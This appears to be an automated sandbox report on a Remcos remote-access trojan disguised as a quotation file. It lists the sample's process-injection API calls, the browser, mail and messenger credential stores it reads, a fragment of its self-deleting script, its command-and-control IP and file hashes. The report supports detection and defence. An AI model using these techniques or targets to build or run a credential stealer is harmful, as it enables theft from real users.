          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040751B Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,1_1_0040751B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,1_1_00412BEE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407898
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407C87
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
          Source: Request for Quotation.exe, 00000000.00000002.642779370.0000000000688000.00000004.00000020.sdmp Binary or memory string: ECVMWar&Prod_VMware_c
          Source: Request for Quotation.exe, 00000001.00000002.903364416.0000000000767000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_6F711A98 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_6F711A98
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_6EEE6B57 mov eax, dword ptr fs:[00000030h] 0_2_6EEE6B57
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 0_2_6EEE6E07 mov eax, dword ptr fs:[00000030h] 0_2_6EEE6E07
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          Contains functionality to inject code into remote processes
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_0040F219
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Request for Quotation.exe Memory written: C:\Users\user\Desktop\Request for Quotation.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Request for Quotation.exe Memory written: C:\Users\user\Desktop\Request for Quotation.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\Desktop\Request for Quotation.exe Memory written: C:\Users\user\Desktop\Request for Quotation.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\Request for Quotation.exe Section loaded: unknown target: C:\Users\user\Desktop\Request for Quotation.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe'
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq'
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\rvowfdgtdozazitngptymckjrq'
          Source: C:\Users\user\Desktop\Request for Quotation.exe Process created: C:\Users\user\Desktop\Request for Quotation.exe 'C:\Users\user\Desktop\Request for Quotation.exe' /stext 'C:\Users\user\AppData\Local\Temp\uptpyvrmrwrfbohrpagsxhxaawaqan'
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: Request for Quotation.exe, 00000001.00000002.903512779.00000000022F6000.00000004.00000040.sdmp Binary or memory string: Program Manageranagerz
          Source: Request for Quotation.exe, 00000001.00000002.903512779.00000000022F6000.00000004.00000040.sdmp Binary or memory string: Program Manageranager
          Source: logs.dat.1.dr Binary or memory string: [ Program Manager ]
          Source: Request for Quotation.exe, 00000001.00000002.903512779.00000000022F6000.00000004.00000040.sdmp Binary or memory string: Program Managerinistrator
          Source: Request for Quotation.exe, 00000001.00000002.903407196.0000000000DF0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: Request for Quotation.exe, 00000001.00000002.903598740.0000000002A67000.00000004.00000001.sdmp Binary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: 1_2_004124A0 cpuid 1_2_004124A0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,1_2_00409E7D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: GetLocaleInfoA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,1_1_00409E7D
          Source: C:\Users\user\Desktop\Request for Quotation.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00402580 GetLocalTime,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,printf,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,CreateThread,1_2_00402580
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_00412163 GetUserNameW,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,1_2_00412163
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected Remcos RAT
          Source: Yara match File source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara match File source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Contains functionality to steal Chrome passwords or cookies
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 1_2_0040710F
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 1_1_0040710F
          Contains functionality to steal Firefox passwords or cookies
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: \key3.db 1_2_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 1_1_0040728F
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: \key3.db 1_1_0040728F
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Users\user\Desktop\Request for Quotation.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Request for Quotation.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Tries to steal Instant Messenger accounts or passwords
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt
          Tries to steal Mail credentials (via file access)
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\Request for Quotation.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Tries to steal Mail credentials (via file registry)
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: ESMTPPassword 5_2_004033E2
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 5_2_00402DA5
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 5_2_00402DA5
          Yara detected WebBrowserPassView password recovery tool
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 6188, type: MEMORY

          Remote Access Functionality:

          Detected Remcos RAT
          Source: Request for Quotation.exe, 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp String found in binary or memory: Remcos_Mutex_Inj
          Source: Request for Quotation.exe, 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Source: Request for Quotation.exe String found in binary or memory: Remcos_Mutex_Inj
          Source: Request for Quotation.exe, 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp String found in binary or memory: \uninstall.vbsexepath\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)\restart.vbsNormalAccess level: Administratorlicence (32 bit) (64 bit)ProductNameInjRemcos_Mutex_InjWDSoftware\licence_code.txt-lShlwapi.dllGetMonitorInfoWEnumDisplayMonitorsuser32EnumDisplayDevicesWSetProcessDEPPolicyShell32IsUserAnAdminGetComputerNameExWkernel32IsWow64Processkernel32.dllGlobalMemoryStatusExGetModuleFileNameExWKernel32.dllPsapi.dllGetModuleFileNameExAProgram Files (x86)\Program Files\1SETTINGS2.7.2 Propth_unencoverridev
          Yara detected Remcos RAT
          Source: Yara match File source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara match File source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara match File source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: cmd.exe 1_2_00402B8A
          Source: C:\Users\user\Desktop\Request for Quotation.exe Code function: cmd.exe 1_1_00402B8A

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API 1 | Application Shimming 1 | Application Shimming 1 | Deobfuscate/Decode Files or Information 1 | OS Credential Dumping 2 | System Time Discovery 1 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot 1
          Default Accounts | Command and Scripting Interpreter 1 | Windows Service 1 | Access Token Manipulation 1 | Obfuscated Files or Information 3 | Input Capture 111 | Account Discovery 1 | Remote Desktop Protocol | Data from Local System 1 | Exfiltration Over Bluetooth | Encrypted Channel 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Service Execution 2 | Logon Script (Windows) | Windows Service 1 | Software Packing 22 | Credentials in Registry 2 | System Service Discovery 1 | SMB/Windows Admin Shares | Email Collection 1 | Automated Exfiltration | Non-Standard Port 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Process Injection 322 | Masquerading 1 | Credentials In Files 3 | File and Directory Discovery 3 | Distributed Component Object Model | Input Capture 111 | Scheduled Transfer | Remote Access Software 1 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion 2 | LSA Secrets | System Information Discovery 48 | SSH | Clipboard Data 2 | Data Transfer Size Limits | Application Layer Protocol 1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation 1 | Cached Domain Credentials | Security Software Discovery 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection 322 | DCSync | Virtualization/Sandbox Evasion 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Process Discovery 4 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Application Window Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Owner/User Discovery 1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Request for Quotation.exe | 27% | Virustotal |
          Request for Quotation.exe | 14% | Metadefender |
          Request for Quotation.exe | 21% | ReversingLabs | Win32.Backdoor.Remcos
          Request for Quotation.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\aqx5kku77.dll | 6% | ReversingLabs |
          C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll | 0% | Metadefender |
          C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

          Source | Detection | Scanner | Label
          3.0.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.0.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          4.2.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
          5.0.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.1.Request for Quotation.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
          5.2.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116590
          4.0.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          0.2.Request for Quotation.exe.2a50000.5.unpack | 100% | Avira | BDS/Backdoor.Gen
          3.2.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1116566
          0.0.Request for Quotation.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1130366
          1.2.Request for Quotation.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://www.imvu.comr | 0% | Avira URL Cloud | safe
          103.89.88.238 | 0% | Avira URL Cloud | safe
          http://www.ebuddy.com | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          103.89.88.238 | true | Avira URL Cloud: safe | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          https://contextual.media.net/checksync.phphttps://contextual.media.net/medianet.php?cid=8CU157172&cr | Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmp | false | | high
          https://login.yahoo.com/config/login | Request for Quotation.exe | false | | high
          http://www.imvu.comr | Request for Quotation.exe, 00000004.00000002.652481642.0000000000400000.00000040.00000001.sdmp | false | Avira URL Cloud: safe | unknown
          http://nsis.sf.net/NSIS_Error | Request for Quotation.exe | false | | high
          http://www.nirsoft.net | Request for Quotation.exe, 00000003.00000002.654097061.0000000000193000.00000004.00000010.sdmp | false | | high
          http://nsis.sf.net/NSIS_ErrorError | Request for Quotation.exe | false | | high
          http://www.nirsoft.net/ | Request for Quotation.exe, Request for Quotation.exe, 00000005.00000001.652992004.0000000000400000.00000040.00020000.sdmp | false | | high
          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2 | Request for Quotation.exe, 00000003.00000003.652133843.00000000022C3000.00000004.00000001.sdmp, Request for Quotation.exe, 00000003.00000003.653713973.00000000022C4000.00000004.00000001.sdmp | false | | high
          http://www.ebuddy.com | Request for Quotation.exe | false | Avira URL Cloud: safe | unknown
          http://www.imvu.com | Request for Quotation.exe | false | | high

                          Contacted IPs

                          Public

                          IP | Domain | Country | ASN | ASN Name | Malicious
                          103.89.88.238 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

                          Private

                          IP
                          192.168.2.1

                          General Information

                          Joe Sandbox Version:31.0.0 Emerald
                          Analysis ID:356426
                          Start date:23.02.2021
                          Start time:07:35:17
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 10m 23s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:Request for Quotation.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                          Number of analysed new started processes analysed:20
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.phis.troj.spyw.evad.winEXE@9/6@0/2
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 78.9% (good quality ratio 62.7%)
                          • Quality average: 62.9%
                          • Quality standard deviation: 39.3%
                          HCA Information:
                          • Successful, ratio: 89%
                          • Number of executed functions: 161
                          • Number of non-executed functions: 187
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .exe
                          Warnings:
                          • Exclude process from analysis (whitelisted): taskhostw.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, UsoClient.exe, wuapihost.exe
                          • Report creation exceeded maximum time and may have missing disassembly code information.
                          • Report size exceeded maximum capacity and may have missing disassembly code.
                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                          Simulations

                          Behavior and APIs

                          Time | Type | Description
                          07:36:03 | API Interceptor | 1081x Sleep call for process: Request for Quotation.exe modified

                          Joe Sandbox View / Context

                          IPs

                          Match | Associated Sample Name / URL | Detection
                          103.89.88.238 | quote.exe | malicious
                          | Quote.exe | malicious
                          | Quotation Request.exe | malicious
                          | payment.exe | malicious
                          | Quotation(6656).exe | malicious
                          | swift copy.exe | malicious

                                      Domains

                                      No context

                                      ASN


                                      JA3 Fingerprints

                                      No context

                                      Dropped Files

                                      Match | Associated Sample Name / URL | Detection
                                      C:\Users\user\AppData\Local\Temp\nsc77A8.tmp\System.dll | #U007einvoice#U007eSC00978656.xlsx | malicious
                                      | Purchase Order___pdf ____________.exe | malicious
                                      | quote.exe | malicious
                                      | Order83930.exe | malicious
                                      | Invoice 6500TH21Y5674.exe | malicious
                                      | Invoice 6500TH21Y5674.exe | malicious
                                      | GPP.exe | malicious
                                      | OrderSuppliesQuote0817916.exe | malicious
                                      | ACCOUNT DETAILS.exe | malicious
                                      | Quotation.com.exe | malicious
                                      | Unterlagen PDF.exe | malicious
                                      | QuotationInvoices.exe | malicious
                                      | PO.exe | malicious
                                      | SecuriteInfo.com.TrojanSpy.MSIL.Agent.22886.exe | malicious
                                      | SecuriteInfo.com.FileRepMalware.24882.exe | malicious
                                      | PDF_doc.exe | malicious
                                      | 09000000000000.jar | malicious
                                      | quotation10204168.dox.xlsx | malicious
                                      | notice of arrivalpdf.exe | malicious
                                      | R5BNZ68i0f.exe | malicious

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Temp\aqx5kku77.dll
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):21504
                                                                              Entropy (8bit):7.408207836374235
                                                                              Encrypted:false
                                                                              SSDEEP:384:OOCV5PqjbmDbusFpGZO7gOG4/yr5RdXF82WNbx/9gJTALB+deFk+riSlxV:O1zPmC/uaG46Rq/9gJALB4+t
                                                                              MD5:D58BF216C5DA94776AACA50132847A49
                                                                              SHA1:4444CBB553381C13409707562CED76CE6525879E
                                                                              SHA-256:04870A6CB3CF7B291FA4BB2378B3AEAE921E0C5D220A8420C327D779B7FD2180
                                                                              SHA-512:19E7F5EF052AE1195A01A993FC3B2E5DD464299A5E666DAA18132FE7F6264A9F354136CC2F3C90D0B20E7FCDC4BF9F8F55C2D63CB74DF0C6DA6F1FB1610AF4FA
                                                                              Malicious:false
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 6%
                                                                              Reputation:low
                                                                              C:\Users\user\AppData\Local\Temp\hbieekorpghvpuxbpehxjpq
                                                                              Process:C:\Users\user\Desktop\Request for Quotation.exe
                                                                              File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):2
                                                                              Entropy (8bit):1.0
                                                                              Encrypted:false
                                                                              SSDEEP:3:Qn:Qn
                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
